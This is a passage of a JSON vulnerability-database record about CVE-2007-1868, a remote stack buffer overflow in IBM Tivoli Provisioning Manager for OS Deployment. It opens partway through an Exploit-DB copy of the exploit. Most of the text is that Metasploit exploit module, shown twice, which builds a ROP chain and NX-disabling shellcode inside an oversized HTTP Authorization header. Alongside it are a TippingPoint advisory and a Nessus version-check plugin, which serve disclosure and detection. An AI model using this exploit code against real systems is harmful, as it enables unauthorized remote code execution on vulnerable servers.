2108, 4 ] = [ ib + 0x11010 ].pack('V')\r\n\r\n\t\t\t# ret 2:\r\n\t\t\t# 76a817f0:\r\n\t\t\t# pop esi <- 0x76a81512 (ocscpy pointer)\r\n\t\t\t# 
retn\r\n\r\n\t\t\tauth[ 2112, 4 ] = [ ib + 0x17f0 ].pack('V')\r\n\t\t\tauth[ 2116, 4 ] = [ ib + 0x1512 ].pack('V')\r\n\r\n\t\t\t# ret 3: (copy the payload in atl.dll data)\r\n\t\t\t# 76a811c8\r\n\t\t\t# lea eax, [esp+3c] <-- eax points to the payload\r\n\t\t\t# push eax <- payload\r\n\t\t\t# push ebp <- 0x76a91010\r\n\t\t\t# call esi <- ocscpy\r\n\t\t\t# cmp eax, ebx <- eax == ebx = 0x76a91010\r\n\t\t\t# jnz before <- jump not taken\r\n\t\t\t# mov eax, ebp\r\n\t\t\t# pop edi\r\n\t\t\t# pop esi\r\n\t\t\t# pop ebp\r\n\t\t\t# pop ebx\r\n\t\t\t# add esp, 1ch\r\n\t\t\t# retn\r\n\r\n\t\t\tauth[ 2120, 4 ] = [ ib + 0x11c8 ].pack('V')\r\n\r\n\r\n\t\t\t# ret 4: (increase the stack pointer to allow a jump back in the payload)\r\n\t\t\t# add esp, 1ch\r\n\t\t\t# retn\r\n\r\n\t\t\tauth[ 2160, 4 ] = [ ib + 0x11da ].pack('V')\r\n\t\t\tauth[ 2184, 2 ] = \"\\xeb\\x56\" # jmp payload\r\n\r\n\r\n\t\t\t# ret 5: (create an executable heap - huge one)\r\n\t\t\t# 76a8c0c4\r\n\t\t\t# jmp ds:__imp_HeapCreate (0xffffffff, 0x01010101, 0x01010101)\r\n\r\n\t\t\tauth[ 2196, 4 ] = [ ib + 0xc0c4 ].pack('V')\r\n\r\n\t\t\t# ret 6:\r\n\t\t\t# 76a817f0\r\n\t\t\t# pop esi <- 0x76a92a38 (hHeap)\r\n\t\t\t# retn\r\n\r\n\t\t\tauth[ 2204, 4 ] = [ ib + 0x17f0 ].pack('V')\r\n\t\t\tauth[ 2208, 4 ] = [ 0xffffffff ].pack('V')\r\n\t\t\tauth[ 2212, 4 ] = [ 0x01010101 ].pack('V')\r\n\t\t\tauth[ 2216, 4 ] = [ 0x01010101 ].pack('V')\r\n\t\t\tauth[ 2220, 4 ] = [ ib + 0x12a38 ].pack('V')\r\n\r\n\t\t\t# ret 7:\r\n\t\t\t# 76a8190a\r\n\t\t\t# mov [esi], eax <- store new heap in hHeap\r\n\t\t\t# mov eax, esi\r\n\t\t\t# pop esi\r\n\t\t\t# retn 4\r\n\r\n\t\t\tauth[ 2224, 4 ] = [ ib + 0x190a ].pack('V')\r\n\r\n\t\t\t# ret 8 (_calloc - needed to allocate a small buffer to prevent a no mem exception):\r\n\t\t\t# 76a88a29\r\n\t\t\t# mov eax, [esp+arg_0] <- 0x7fffffa0\r\n\t\t\t# imul eax, [esp+arg_4] <- eax * 0x7fffffa0 = 0x2400\r\n\t\t\t# push eax\r\n\t\t\t# call _malloc\r\n\t\t\t# pop ecx <- ecx = 0x2400\r\n\t\t\t# 
retn\r\n\r\n\t\t\tauth[ 2232, 4 ] = [ ib + 0x8a29 ].pack('V')\r\n\r\n\t\t\t# ret 9:\r\n\t\t\t# 76a8c9ab\r\n\t\t\t# add esp, 0ch\r\n\t\t\t# retn 4\r\n\r\n\t\t\tauth[ 2240, 4 ] = [ ib + 0xc9ab ].pack('V')\r\n\t\t\tauth[ 2244, 4 ] = [ 0x7fffffa0 ].pack('V')\r\n\t\t\tauth[ 2248, 4 ] = [ 0x7fffffa0 ].pack('V')\r\n\r\n\t\t\t# ret 10 (copy payload into heap):\r\n\t\t\t# 76a8c9a0\r\n\t\t\t# push ecx <- 0x2400\r\n\t\t\t# push [esp+8] <- 0x76a91010 (payload in atl.dll data)\r\n\t\t\t# push eax <- heap pointer\r\n\t\t\t# call _memcpy\r\n\t\t\t# add esp, 0ch\r\n\t\t\t# retn\r\n\r\n\t\t\tauth[ 2256, 4 ] = [ ib + 0xc9a0 ].pack('V')\r\n\r\n\t\t\t# ret 11 (jump into heap)\r\n\t\t\t# 76a815e7\r\n\t\t\t# call eax\r\n\r\n\t\t\tauth[ 2264, 4 ] = [ ib + 0x15e7 ].pack('V')\r\n\t\t\tauth[ 2268, 4 ] = [ ib + 0x11010 ].pack('V')\r\n\r\n\t\t\tauth[ 2272, payload.encoded.length ] = payload.encoded\r\n\r\n\t\telse\r\n\t\t\tauth = Rex::Text.rand_text_alphanumeric(2800)\r\n\r\n\t\t\tauth[ 2080, 4 ] = [ target['Rets'][1] ].pack('V')\r\n\t\t\tauth[ 2096, 4 ] = [ target['Rets'][2] ].pack('V') # pop, ret\r\n\t\t\tauth[ 2100, 4 ] = [ target['Rets'][1] ].pack('V')\r\n\t\t\tauth[ 2104, 4 ] = [ target['Rets'][0] ].pack('V') # jmp esp\r\n\t\t\tauth[ 2108, payload.encoded.length ] = payload.encoded\r\n\r\n\t\tend\r\n\r\n\t\tprint_status(\"Trying target #{target.name}...\")\r\n\r\n\t\tres = send_request_cgi({\r\n\t\t\t'uri' => '/',\r\n\t\t\t'method' => 'GET',\r\n\t\t\t'headers' =>\r\n\t\t\t{\r\n\t\t\t\t'Authorization' => \"Basic #{auth}\"\r\n\t\t\t}\r\n\t\t}, 5)\r\n\r\n\t\thandler\r\n\tend\r\n\r\nend\r\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://www.exploit-db.com/download/16810/"}], "metasploit": [{"lastseen": "2019-11-02T09:37:46", "bulletinFamily": "exploit", "description": "This is a stack buffer overflow exploit for IBM Tivoli Provisioning Manager for OS Deployment version 5.1.0.X.\n", "modified": "2017-07-24T13:26:21", 
"published": "2007-05-03T20:02:28", "id": "MSF:EXPLOIT/WINDOWS/HTTP/IBM_TPMFOSD_OVERFLOW", "href": "", "type": "metasploit", "title": "IBM TPM for OS Deployment 5.1.0.x rembo.exe Buffer Overflow", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = GoodRanking\n\n include Msf::Exploit::Remote::HttpClient\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'IBM TPM for OS Deployment 5.1.0.x rembo.exe Buffer Overflow',\n 'Description' => %q{\n This is a stack buffer overflow exploit for IBM Tivoli Provisioning Manager\n for OS Deployment version 5.1.0.X.\n },\n 'Author' => 'toto',\n 'License' => MSF_LICENSE,\n 'References' =>\n [\n [ 'CVE', '2007-1868'],\n [ 'OSVDB', '34678'],\n [ 'BID', '23264'],\n [ 'URL', 'http://dvlabs.tippingpoint.com/advisory/TPTI-07-05' ],\n ],\n 'DefaultOptions' =>\n {\n 'EXITFUNC' => 'process',\n },\n 'Privileged' => true,\n 'Payload' =>\n {\n #'Space' => 0x200,\n 'BadChars' => \"\\x00\\x3a\\x26\\x3f\\x25\\x23\\x20\\x0a\\x0d\\x2f\\x2b\\x0b\\x5c&=+?:;-,/#.\\\\$%\\x1a\",\n 'Prepend' =>\n # Disable NX on 2k3 to upload data on the stack\n # (service crashes if the stack is switched to the heap)\n \"\\x64\\x8b\\x0d\\x30\\x00\\x00\\x00\" + # mov ecx, dword ptr fs:[0x30] ; PEB\n \"\\x83\\xb9\\xa4\\x00\\x00\\x00\\x05\" + # cmp dword ptr [ecx+0xa4], 5 ; MajorVersion == 5\n \"\\x75\\x30\" + # jnz after\n \"\\x83\\xb9\\xa8\\x00\\x00\\x00\\x02\" + # cmp dword ptr [ecx+0xa8], 2 ; MinorVersion == 2\n \"\\x75\\x27\" + # jnz after\n \"\\x81\\xb9\\xac\\x00\\x00\\x00\\xce\\x0e\\x00\\x00\" + # cmp dword ptr [ecx+0xac], 0xece ; BuildVersion (> SP0)\n \"\\x76\\x1b\" + # jbe after\n \"\\x8d\\x89\\xa8\\x00\\x00\\x00\" + # lea ecx, [ecx+0xa8]\n \"\\xba\\x00\\x03\\xfe\\x7f\" + # mov edx, 0x7ffe0300\n \"\\xb8\\xed\\x00\\x00\\x00\" + # mov eax, 0xed\n \"\\x6a\\x04\" + # push 4\n \"\\x51\" + # 
push ecx\n \"\\x6a\\x22\" + # push 22\n \"\\x6a\\xff\" + # push -1\n \"\\x6a\\xff\" + # push -1 (padding)\n \"\\xff\\x12\", # call dword ptr[edx]\n 'StackAdjustment' => -3500,\n },\n 'Platform' => 'win',\n 'Targets' =>\n [\n ['TPMfOSD 5.1 (Windows 2000 SP4 - English)', { 'Rets' => [0x77bb53af, 0x77bb06f0, 0x75022ac5] }],\n # tested against 5.1.0.1 and 5.1.0.2 (use ATL.Dll)\n ['TPMfOSD 5.1 (Windows 2003 All - English)', { 'IB' => 0x76a80000, 'Data' => 0x01061980 }],\n ],\n 'DisclosureDate' => 'May 02 2007',\n 'DefaultTarget' => 0))\n\n register_options(\n [\n Opt::RPORT(443),\n OptBool.new('SSL', [true, 'Use SSL', true]),\n ])\n end\n\n def exploit\n\n if target.name =~ /2003/\n # the exploit allocates and executable heap to copy and execute the payload\n\n auth = Rex::Text.rand_text_alphanumeric(2800)\n\n ib = target['IB']\n\n auth[ 2080, 4 ] = [ ib + 0x11010 ].pack('V') # store a data to prevent a crash\n\n # ret 1:\n # 76a81a5f:\n # pop esi <- 0x76a91010\n # pop ebx <- 0x76a91010\n # pop ebp <- 0x76a91010\n # retn\n\n auth[ 2096, 4 ] = [ ib + 0x1a5f ].pack('V')\n auth[ 2100, 4 ] = [ target['Data'] ].pack('V')\n auth[ 2104, 4 ] = [ ib + 0x11010 ].pack('V')\n auth[ 2108, 4 ] = [ ib + 0x11010 ].pack('V')\n\n # ret 2:\n # 76a817f0:\n # pop esi <- 0x76a81512 (ocscpy pointer)\n # retn\n\n auth[ 2112, 4 ] = [ ib + 0x17f0 ].pack('V')\n auth[ 2116, 4 ] = [ ib + 0x1512 ].pack('V')\n\n # ret 3: (copy the payload in atl.dll data)\n # 76a811c8\n # lea eax, [esp+3c] <-- eax points to the payload\n # push eax <- payload\n # push ebp <- 0x76a91010\n # call esi <- ocscpy\n # cmp eax, ebx <- eax == ebx = 0x76a91010\n # jnz before <- jump not taken\n # mov eax, ebp\n # pop edi\n # pop esi\n # pop ebp\n # pop ebx\n # add esp, 1ch\n # retn\n\n auth[ 2120, 4 ] = [ ib + 0x11c8 ].pack('V')\n\n\n # ret 4: (increase the stack pointer to allow a jump back in the payload)\n # add esp, 1ch\n # retn\n\n auth[ 2160, 4 ] = [ ib + 0x11da ].pack('V')\n auth[ 2184, 2 ] = \"\\xeb\\x56\" # jmp 
payload\n\n\n # ret 5: (create an executable heap - huge one)\n # 76a8c0c4\n # jmp ds:__imp_HeapCreate (0xffffffff, 0x01010101, 0x01010101)\n\n auth[ 2196, 4 ] = [ ib + 0xc0c4 ].pack('V')\n\n # ret 6:\n # 76a817f0\n # pop esi <- 0x76a92a38 (hHeap)\n # retn\n\n auth[ 2204, 4 ] = [ ib + 0x17f0 ].pack('V')\n auth[ 2208, 4 ] = [ 0xffffffff ].pack('V')\n auth[ 2212, 4 ] = [ 0x01010101 ].pack('V')\n auth[ 2216, 4 ] = [ 0x01010101 ].pack('V')\n auth[ 2220, 4 ] = [ ib + 0x12a38 ].pack('V')\n\n # ret 7:\n # 76a8190a\n # mov [esi], eax <- store new heap in hHeap\n # mov eax, esi\n # pop esi\n # retn 4\n\n auth[ 2224, 4 ] = [ ib + 0x190a ].pack('V')\n\n # ret 8 (_calloc - needed to allocate a small buffer to prevent a no mem exception):\n # 76a88a29\n # mov eax, [esp+arg_0] <- 0x7fffffa0\n # imul eax, [esp+arg_4] <- eax * 0x7fffffa0 = 0x2400\n # push eax\n # call _malloc\n # pop ecx <- ecx = 0x2400\n # retn\n\n auth[ 2232, 4 ] = [ ib + 0x8a29 ].pack('V')\n\n # ret 9:\n # 76a8c9ab\n # add esp, 0ch\n # retn 4\n\n auth[ 2240, 4 ] = [ ib + 0xc9ab ].pack('V')\n auth[ 2244, 4 ] = [ 0x7fffffa0 ].pack('V')\n auth[ 2248, 4 ] = [ 0x7fffffa0 ].pack('V')\n\n # ret 10 (copy payload into heap):\n # 76a8c9a0\n # push ecx <- 0x2400\n # push [esp+8] <- 0x76a91010 (payload in atl.dll data)\n # push eax <- heap pointer\n # call _memcpy\n # add esp, 0ch\n # retn\n\n auth[ 2256, 4 ] = [ ib + 0xc9a0 ].pack('V')\n\n # ret 11 (jump into heap)\n # 76a815e7\n # call eax\n\n auth[ 2264, 4 ] = [ ib + 0x15e7 ].pack('V')\n auth[ 2268, 4 ] = [ ib + 0x11010 ].pack('V')\n\n auth[ 2272, payload.encoded.length ] = payload.encoded\n\n else\n auth = Rex::Text.rand_text_alphanumeric(2800)\n\n auth[ 2080, 4 ] = [ target['Rets'][1] ].pack('V')\n auth[ 2096, 4 ] = [ target['Rets'][2] ].pack('V') # pop, ret\n auth[ 2100, 4 ] = [ target['Rets'][1] ].pack('V')\n auth[ 2104, 4 ] = [ target['Rets'][0] ].pack('V') # jmp esp\n auth[ 2108, payload.encoded.length ] = payload.encoded\n\n end\n\n print_status(\"Trying target 
#{target.name}...\")\n\n res = send_request_cgi({\n 'uri' => '/',\n 'method' => 'GET',\n 'headers' =>\n {\n 'Authorization' => \"Basic #{auth}\"\n }\n }, 5)\n\n handler\n end\nend\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/windows/http/ibm_tpmfosd_overflow.rb"}], "securityvulns": [{"lastseen": "2018-08-31T11:10:22", "bulletinFamily": "software", "description": "TPTI-07-05: IBM Tivoli Provisioning Manager for OS Deployment Multiple\r\n Stack Overflow Vulnerabilities\r\nhttp://dvlabs.tippingpoint.com/advisory/TPTI-07-05\r\nMay 2, 2007\r\n\r\n-- CVE ID:\r\nCVE-2007-1868\r\n\r\n-- Affected Vendor:\r\nIBM\r\n\r\n-- Affected Products:\r\nTivoli Provisioning Manager for OS Deployment\r\n\r\n-- Vulnerability Details:\r\nThis vulnerability allows remote attackers to execute arbitrary code on\r\nsystems with vulnerable installations of IBM Tivoli Provisioning\r\nManager for OS Deployment. Authentication is not required to exploit\r\nthis vulnerability.\r\n\r\nThe specific flaws exist in the handling of HTTP requests to the\r\nrembo.exe service listening on TCP port 8080. Several components of an\r\nHTTP request can be modified to trigger buffer overflows. For example,\r\nby supplying an overly long filename an attacker is able to overflow a\r\n150 byte stack buffer and subsequently execute arbitrary code. The\r\noverflow occurs during a string copy loop, shown here:\r\n\r\n 00431136 lea edi, [ebp+var_3C4] ; 150 byte stack buffer\r\n ...\r\n 00431148 stringcopy:\r\n 00431148 mov al, [edx] ; edx -> our data\r\n 0043114A add edx, 1\r\n 0043114D mov [edi], al ; edi -> stack buffer\r\n 0043114F add edi, 1\r\n 00431152 test al, al\r\n 00431154 jnz short stringcopy\r\n\r\nThe Host and Authorization fields are also vulnerable to similar\r\nexploitable overflows.\r\n\r\n-- Vendor Response:\r\nIBM has issued an update to correct this vulnerability. 
More details can\r\nbe found at:\r\n\r\n http://www-1.ibm.com/support/docview.wss?uid=swg24015664\r\n\r\n-- Disclosure Timeline:\r\n2006.12.18 - Vulnerability reported to vendor\r\n2007.05.02 - Coordinated public release of advisory\r\n\r\n-- Credit:\r\nThis vulnerability was discovered by Aaron Portnoy, TippingPoint\r\nSecurity Research Team.", "modified": "2007-05-04T00:00:00", "published": "2007-05-04T00:00:00", "id": "SECURITYVULNS:DOC:16934", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:16934", "title": "TPTI-07-05: IBM Tivoli Provisioning Manager for OS Deployment Multiple Stack Overflow Vulnerabilities", "type": "securityvulns", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-08-31T11:09:25", "bulletinFamily": "software", "description": "Multiple vulnerabilities on parsing HTTP POST requests.", "modified": "2007-05-04T00:00:00", "published": "2007-05-04T00:00:00", "id": "SECURITYVULNS:VULN:7526", "href": "https://vulners.com/securityvulns/SECURITYVULNS:VULN:7526", "title": "Tivoli Provisioning Manager for OS Deployment multiple security vulnerabilities", "type": "securityvulns", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-08-31T11:09:25", "bulletinFamily": "software", "description": "Invalid handling of HTTP POST multipart/form-data requests to 8080/tcp or 443/tcp ports.", "modified": "2007-04-11T00:00:00", "published": "2007-04-11T00:00:00", "id": "SECURITYVULNS:VULN:7566", "href": "https://vulners.com/securityvulns/SECURITYVULNS:VULN:7566", "title": "IBM Tivoli Provisioning Manager for OS Deployment DoS", "type": "securityvulns", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "nessus": [{"lastseen": "2019-11-01T02:47:28", "bulletinFamily": "scanner", "description": "The remote host is running IBM Tivoli Provisioning Manager for OS\nDeployment. 
The version of this software contains multiple\nunspecified memory corruption vulnerabilities in the HTTP server. \n\nA remote attacker may exploit these flaws to crash the service or\nexecute code on the remote host with the privileges of the TPM server.", "modified": "2019-11-02T00:00:00", "id": "IBM_TPMFOSD_CORRUPTION.NASL", "href": "https://www.tenable.com/plugins/nessus/25005", "published": "2007-04-07T00:00:00", "title": "IBM Tivoli Provisioning Manager OS Deployment Multiple Unspecified Input Validation Vulnerabilities", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(25005);\n script_version(\"1.15\");\n\n script_cve_id(\"CVE-2007-1868\");\n script_bugtraq_id(23264);\n\n script_name(english:\"IBM Tivoli Provisioning Manager OS Deployment Multiple Unspecified Input Validation Vulnerabilities\");\n script_summary(english:\"Gets IBM TPM for OS Deployment Server version\");\n \n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote web server is affected by multiple vulnerabilities.\" );\n script_set_attribute(attribute:\"description\", value:\n\"The remote host is running IBM Tivoli Provisioning Manager for OS\nDeployment. The version of this software contains multiple\nunspecified memory corruption vulnerabilities in the HTTP server. 
\n\nA remote attacker may exploit these flaws to crash the service or\nexecute code on the remote host with the privileges of the TPM server.\" );\n # http://www.verisigninc.com/en_US/products-and-services/network-intelligence-availability/idefense/public-vulnerability-reports/articles/index.xhtml?id=498\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?c482fc38\" );\n script_set_attribute(attribute:\"solution\", value:\n\"Install TPM for OS Deployment FIx Pack 2.\" );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'IBM TPM for OS Deployment 5.1.0.x rembo.exe Buffer Overflow');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"plugin_publication_date\", value: \"2007/04/07\");\n script_set_attribute(attribute:\"patch_publication_date\", value: \"2007/04/01\");\n script_set_attribute(attribute:\"vuln_publication_date\", value: \"2007/04/01\");\n script_cvs_date(\"Date: 2018/07/12 19:01:16\");\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_set_attribute(attribute:\"cpe\",value:\"cpe:/a:ibm:tivoli_provisioning_manager_os_deployment\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Web Servers\");\n script_copyright(english:\"This script is Copyright (C) 2007-2018 Tenable Network Security, Inc.\");\n script_dependencies(\"http_version.nasl\");\n script_require_ports(\"Services/www\", 8080, 443);\n\n exit(0);\n}\n\n\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"http.inc\");\n\n\nport = get_http_port(default:8080);\n\nbanner = get_http_banner(port:port);\nif (\"Server: 
Rembo\" >!< banner)\n exit (0);\n\nw = http_send_recv3(method:\"GET\", item:\"/builtin/index.html\", port:port);\nif (isnull(w)) exit(1, \"the web server did not answer\");\nres = w[2];\n\npat = '<p style=\"font: 12px Verdana, Geneva, Arial, Helvetica, sans-serif;\"><b>TPMfOSd ([0-9]+\\\\.[0-9]+\\\\.[0-9]+\\\\.[0-9]+) \\\\(build [0-9]+\\\\.[0-9]+\\\\)</b>.*';\n\nvers = egrep(pattern:pat, string:res);\nif (!vers)\n exit (0);\n\nvers = ereg_replace(pattern:pat, string:vers, replace:\"\\1\");\nvers = split (vers, sep:\".\", keep:FALSE);\n\nif ( (int(vers[0]) < 5) ||\n (int(vers[0]) == 5 && int(vers[1]) < 1) ||\n (int(vers[0]) == 5 && int(vers[1]) == 1 && int(vers[2]) == 0 && int(vers[3]) < 2) )\n security_hole(port);\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}]}